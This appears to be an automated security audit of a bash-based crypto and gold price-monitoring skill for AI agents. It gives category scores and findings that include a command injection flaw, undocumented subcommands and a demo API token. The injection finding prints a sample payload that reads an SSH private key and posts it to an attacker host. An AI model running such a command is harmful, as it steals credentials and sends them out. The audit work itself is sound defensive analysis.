Oathe Security Badge

Is franky0617/crypto-gold-monitor safe?

https://github.com/openclaw/skills/tree/main/skills/franky0617/crypto-gold-monitor

Overall score: 77/100 (CAUTION)

The crypto-gold-monitor skill is a bash-based price monitoring tool whose primary security concern is a shell command injection vulnerability in the cmd_update subcommand, where unvalidated user arguments are interpolated into a double-quoted shell string, enabling arbitrary code execution. The skill also overstates its capabilities in SKILL.md by documenting eight subcommands that do not exist in the implementation, which will cause confusion for any AI agent relying on the documentation. Canary file integrity was confirmed intact, and the installation itself was clean, with no unexpected network or filesystem activity attributable to the skill.

Category Scores

Prompt Injection 85/100 · 30%
Data Exfiltration 80/100 · 25%
Code Execution 50/100 · 20%
Clone Behavior 92/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 60/100 · 5%

Findings (6)

HIGH Shell Command Injection via Unvalidated cmd_update Arguments -35

The cmd_update function assigns the first two positional arguments to $gold and $silver without any type-checking, regex validation, or quoting, then interpolates them inside a double-quoted echo string. Bash performs full command substitution inside double quotes, meaning a value like $(cat ~/.ssh/id_rsa | base64 | curl -s -d @- https://attacker.com/) would execute at shell expansion time. Any vector that causes the agent to call 'crypto-monitor update' with attacker-controlled arguments results in arbitrary code execution under the agent's OS identity.

MEDIUM Documented Commands Not Implemented in Script -15

SKILL.md advertises subcommands btc, eth, crypto, gold, silver, metals, compare, rankings, alert, and --interval. The actual case statement in crypto-monitor.sh only handles: all|a, update|up, refresh|r, help|--help|-h. Any agent following the documentation will invoke undefined commands that exit with error code 1, producing unhelpful output and potentially causing retry loops or hallucinated tool responses.

MEDIUM Inline python3 Execution with API-Derived Data Feeding Shell Variables -15

API response data is parsed via python3 -c 'import sys,json; print(...)' and the printed value assigned to shell variables. Those variables are then used unquoted in bc arithmetic expressions and heredoc blocks. While json.load() prevents JSON-level injection, a compromised upstream API or DNS rebinding attack could return crafted numeric strings. The silver estimation uses 'echo "scale=2; $gold / 85" | bc' with $gold unquoted, and the metals heredoc interpolates all four variables without sanitization.

LOW Multiple Outbound HTTP Requests to Four External Domains -10

The script unconditionally calls four external price APIs on each invocation: api.exchangerate-api.com, api.coingecko.com, www.goldapi.io, and query1.finance.yahoo.com. While the current request URLs contain no user data, the pattern establishes outbound connectivity from the agent host. A modified version of this skill, or a future update, could append exfiltrated data to query parameters. API servers also observe the agent host's IP address and timing on every call.

LOW Hardcoded Demo API Token and Silent Fallback to Stub Prices -10

The GoldAPI.io request includes the header 'x-access-token: demo'. This shared credential will be rate-limited or rejected in production, causing the function to silently fall back to the hardcoded stub value of $2650 for gold. The skill provides no user-visible indication that stub prices are being served instead of live data, making it unreliable as a financial tool and potentially misleading.

INFO Clean Sparse Checkout from Legitimate Monorepo 0

Installation performed a shallow sparse checkout from https://github.com/openclaw/skills.git targeting only the skills/franky0617/crypto-gold-monitor subdirectory. Network activity was limited to GitHub (140.82.121.3:443) and the local DNS resolver. No unexpected processes spawned, no files written outside the skill directory, and the temporary clone was deleted after copying.